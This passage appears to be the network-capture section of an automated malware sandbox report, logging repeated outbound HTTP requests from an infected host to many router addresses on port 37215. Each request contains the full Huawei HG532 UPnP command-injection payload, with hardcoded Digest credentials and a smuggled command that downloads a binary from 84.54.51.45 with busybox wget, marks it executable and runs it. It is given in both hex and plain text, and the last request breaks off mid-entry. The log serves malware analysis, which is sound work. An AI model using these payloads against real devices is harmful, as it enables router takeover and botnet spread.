68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            883192.168.2.154723641.138.124.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742702007 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            884192.168.2.155937241.177.24.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742789984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            885192.168.2.154897841.209.14.7737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.742790937 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            886192.168.2.154594241.221.246.16737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744349003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            887192.168.2.154917841.218.230.11537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744369984 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            888192.168.2.154450641.104.133.10437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744441986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            889192.168.2.156000241.164.49.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744468927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            890192.168.2.154307441.43.219.18837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744468927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            891192.168.2.153553441.79.192.22337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744468927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            892192.168.2.155816841.65.81.2537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744499922 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            893192.168.2.155125841.234.245.12637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744527102 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
